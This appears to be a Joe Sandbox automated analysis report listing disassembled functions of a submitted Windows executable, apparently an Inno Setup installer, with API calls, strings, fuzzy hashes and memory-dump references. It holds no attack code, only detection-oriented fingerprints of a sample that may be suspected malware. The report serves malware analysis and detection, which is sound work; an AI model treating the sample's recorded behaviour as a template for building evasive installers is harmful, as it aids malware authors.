Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: 8bec8c91e4db80f916d04adf4cce8d640474384e6a809fab131d495f4cf7285d
Instruction ID: 62f98a927e5d18dfd067733e82cc858d6425e225367395d1bb64f11078388387
Opcode Fuzzy Hash: 8bec8c91e4db80f916d04adf4cce8d640474384e6a809fab131d495f4cf7285d
Instruction Fuzzy Hash: 03D05E123831B03146307BB728059CB86AC8DD66AB389047BB5409B303E91D8A0A51AC

Function 004242D4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(?,00000000), ref: 004242EC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 7b629e4230a16754486ed56ae920d883ae8ae6fbac6fb4db25cd6a5c7ea909d6
Instruction ID: 45ecccad5147b2ee88577654b541c8e67cd655c44182ff5547076257999a9e8e
Opcode Fuzzy Hash: 7b629e4230a16754486ed56ae920d883ae8ae6fbac6fb4db25cd6a5c7ea909d6
Instruction Fuzzy Hash: 82D05BE270116017CB01BAED54C4AC657CC5B4925A71540B7F904EF257C678CD448398

Function 00466BE8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004678D0,00000000,00000000,00000000,0000000C,00000000), ref: 00466C00

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0

Function 0042CD34 Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0045163F,00000000), ref: 0042CD3F

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bfa7c436ea4076489e3194c110aeffa5b63c2464b47e17bafb8d8bd18f179746
Instruction ID: fe1bff9429d4e90dee18816d853216f65d631ba0a2a06ffe7669bbedc21dff1a
Opcode Fuzzy Hash: bfa7c436ea4076489e3194c110aeffa5b63c2464b47e17bafb8d8bd18f179746
Instruction Fuzzy Hash: 6FC08CE0322210169E20A6BD6CC951F06CC895837A3A40A77B03CEA2E2D23DD8162028

Function 00406ED0 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6E4,0040CC90,?,00000000,?), ref: 00406EED

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5ea83bba119d08381cf5149d3e870d091e521e5b09d6abf0e71c1523e48d3119
Instruction ID: a78e408fffc15bc8d0ee8a54c686fbaa4e2694f5c3f88f37cecd524e454749ad
Opcode Fuzzy Hash: 5ea83bba119d08381cf5149d3e870d091e521e5b09d6abf0e71c1523e48d3119
Instruction Fuzzy Hash: ADC048B13C130032F93025A61C87F1604889714B1AE60943AB740BE1C2D8E9A818016C

Function 004509A0 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,?,0045C3EA,00000000,0045C575,?,00000000,00000002,00000002), ref: 004509A7

Part of subcall function 00450728: GetLastError.KERNEL32(00450544,004507EA,?,00000000,?,00498504,00000001,00000000,00000002,00000000,00498665,?,?,00000005,00000000,00498699), ref: 0045072B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: ab92c804e13779e6a8a378971558b34dc584b681704b9a97c4630cfb3c940cd1
Instruction ID: 0486764e065467a501855473afd0cd0cb10eaee8d6f94b4102cded937092f4df
Opcode Fuzzy Hash: ab92c804e13779e6a8a378971558b34dc584b681704b9a97c4630cfb3c940cd1
Instruction Fuzzy Hash: 0DC04CA9301201879F40A6AE85C190663DC9E1C3597504566B904CF20BD769DC044A14

Function 004072B8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

SetCurrentDirectoryA.KERNEL32(00000000,?,00498492,00000000,00498665,?,?,00000005,00000000,00498699,?,?,00000000), ref: 004072C3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514

Function 0042E3FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18

Function 004165FC Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 00416603

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DestroyWindow
String ID:
API String ID: 3375834691-0
Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
Instruction ID: 951f12253bcdbe2be33f1d7372765b1b3ebb510443260a24e1bbd496af9ec3c9
Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
Instruction Fuzzy Hash: AFA002755015409ADB10E7A5C84DF7A2298BF44204FD905FA714CA7052C53CD9008A55

Function 0044879C Relevance: 1.4, APIs: 1, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e6278b00533fbd37ee9a008ccbf002b6a3644c608c9d01cb394214cb5b0466
Instruction ID: 339ef80cccba5c7eac5873b70fc8c7721134c1cb18e48c6be9d277410f7c1673
Opcode Fuzzy Hash: 54e6278b00533fbd37ee9a008ccbf002b6a3644c608c9d01cb394214cb5b0466
Instruction Fuzzy Hash: 91518474E042499FEB01EFA9C882AAEBBF5EB49304F50407AE500A7351DB389D41CB99

Function 0047E21C Relevance: 1.4, APIs: 1, Instructions: 157COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047E407,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047E3C1

Part of subcall function 0042CA10: GetSystemMetrics.USER32(0000002A), ref: 0042CA22

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ByteCharMetricsMultiSystemWide
String ID:
API String ID: 224039744-0
Opcode ID: 5d71ed7f78605e465d4fedccc20939528007dd55206323f19120b13c5f88598b
Instruction ID: f91779ff8fcf2a57f01fce6343996b16dddddfd0a70f262f58e8d3032392e39f
Opcode Fuzzy Hash: 5d71ed7f78605e465d4fedccc20939528007dd55206323f19120b13c5f88598b
Instruction Fuzzy Hash: BC518870A00205AFD720DF9AD885B9A7BB8EB1C309F1181B7E804E73A1D7789D45CB59

Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2501c7b5f1b7e2a32cc088a261609a538437b101066d50b70fa7879060b37a7f
Instruction ID: df12e3cc7205ed3866b0622d7fc8c89f1b444ce5416b62958542d3ca819b8d78
Opcode Fuzzy Hash: 2501c7b5f1b7e2a32cc088a261609a538437b101066d50b70fa7879060b37a7f
Instruction Fuzzy Hash: 5A1148742007069BCB10DF19C880B82FBE4EB98390B10D53BE9588B385D378E8558BA9

Function 00453038 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,004530A1), ref: 00453083

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 3dbc9b6b19259a40e1a8eccd310b33d8d478e911805451e546832dad24d45a24
Instruction ID: 94e22d98a6c00f19aef873439ff0cfb4dcf68a684d4d060e49f788bb75b395da
Opcode Fuzzy Hash: 3dbc9b6b19259a40e1a8eccd310b33d8d478e911805451e546832dad24d45a24
Instruction Fuzzy Hash: 0701FC35604304AF8711DF69AC118EEBBE8DB8A76175042B7FC64D3382D6744E059764

Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,?,?,000011E0,000051E3,00401973), ref: 00401766

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: c2ec33a786a38e7bd0169ef8bddb7cde116ed653613200da8896670bb901eae8
Instruction ID: be7f0be69d4b25e877c81db3c68dd302dbc4ff1700a0c49f545652be0e594e9c
Opcode Fuzzy Hash: c2ec33a786a38e7bd0169ef8bddb7cde116ed653613200da8896670bb901eae8
Instruction Fuzzy Hash: 1401FC766442148FC3109F29DCC0E2677E8D794378F15453EDA85673A1D37A6C0187D8

Function 00406F58 Relevance: 1.3, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00406F59

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6d5f4615d296fbbc3d990cf813c80aa0ea5a8011e2983691863e8f068271b578
Instruction ID: 6160d783662a008e1f799edb03f3d460fe671c60c73369e1be62f9e55b6485aa
Opcode Fuzzy Hash: 6d5f4615d296fbbc3d990cf813c80aa0ea5a8011e2983691863e8f068271b578
Instruction Fuzzy Hash:

Non-executed Functions

Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F

Strings

Ctl3dRegister, xrefs: 0041F191
Ctl3dSubclassCtl, xrefs: 0041F1CF
CTL3D32.DLL, xrefs: 0041F159
Ctl3dUnAutoSubclass, xrefs: 0041F238
Ctl3dDlgFramePaint, xrefs: 0041F1F9
BtnWndProc3d, xrefs: 0041F262
Ctl3dUnregister, xrefs: 0041F1BA
Ctl3DColorChange, xrefs: 0041F24D
Ctl3dCtlColorEx, xrefs: 0041F20E
Ctl3dAutoSubclass, xrefs: 0041F223
Ctl3dSubclassDlgEx, xrefs: 0041F1E4

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 2323315520-3614243559
Opcode ID: 8697dd9d154f8e50884d4e158cb0ab166183fda0357b492364bfbc044a4492e6
Instruction ID: cc035a32af1c864732f55fa5d96a8ee37849f8948b3bb020ccbabec4f333c5ef
Opcode Fuzzy Hash: 8697dd9d154f8e50884d4e158cb0ab166183fda0357b492364bfbc044a4492e6
Instruction Fuzzy Hash: 953142B1740600BBD701EBB5EC86A7A3394F768724B45093BB444EB192D77C4CA98F5D

Function 00458670 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004586D7
QueryPerformanceCounter.KERNEL32(02123858,00000000,0045896A,?,?,02123858,00000000,?,00459066,?,02123858,00000000), ref: 004586E0
GetSystemTimeAsFileTime.KERNEL32(02123858,02123858), ref: 004586EA
GetCurrentProcessId.KERNEL32(?,02123858,00000000,0045896A,?,?,02123858,00000000,?,00459066,?,02123858,00000000), ref: 004586F3
CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458769
GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02123858,02123858), ref: 00458777
CreateFileA.KERNEL32(00000000,C0000000,00000000,0049AB24,00000003,00000000,00000000,00000000,00458926), ref: 004587BF
SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458915,?,00000000,C0000000,00000000,0049AB24,00000003,00000000,00000000,00000000,00458926), ref: 004587F8

Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7

CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004588A1
CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 004588D7
CloseHandle.KERNEL32(000000FF,0045891C,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0045890F

Part of subcall function 00453510: GetLastError.KERNEL32(00000000,004540A5,00000005,00000000,004540DA,?,?,00000000,0049C628,00000004,00000000,00000000,00000000,?,00498A7D,00000000), ref: 00453513

Strings

CreateFile, xrefs: 004587CD
D, xrefs: 0045881A
CreateNamedPipe, xrefs: 00458787
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x, xrefs: 0045873F
Starting 64-bit helper process., xrefs: 004586A5
64-bit helper EXE wasn't extracted, xrefs: 004586CB
helper %d 0x%x, xrefs: 00458880
i, xrefs: 00458854
Helper process PID: %u, xrefs: 004588F4
CreateProcess, xrefs: 004588AA
SetNamedPipeHandleState, xrefs: 00458801
Cannot utilize 64-bit features on this version of Windows, xrefs: 004586B8

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
API String ID: 770386003-3271284199
Opcode ID: cae4615f4f3b0edee685ea835cc75ed235771dfd5f29473c0633b013cfbf874c
Instruction ID: dce1d9d3a47b8e631bda5ef5291cfb12a825263051becb9b2fd33ba3793b7428
Opcode Fuzzy Hash: cae4615f4f3b0edee685ea835cc75ed235771dfd5f29473c0633b013cfbf874c
Instruction Fuzzy Hash: 2F710470A00248AEDB10DF65CC45B9E77F4EB05709F1044AAF944FB282DB785944CF6A

Function 00478940 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 004787AC: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787C5
Part of subcall function 004787AC: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004787CB
Part of subcall function 004787AC: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 004787DE
Part of subcall function 004787AC: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BD4,?,?,?,02122BD4), ref: 00478808
Part of subcall function 004787AC: CloseHandle.KERNEL32(00000000,?,?,?,02122BD4,00478970,00000000,00478A8E,?,?,?,?), ref: 00478826

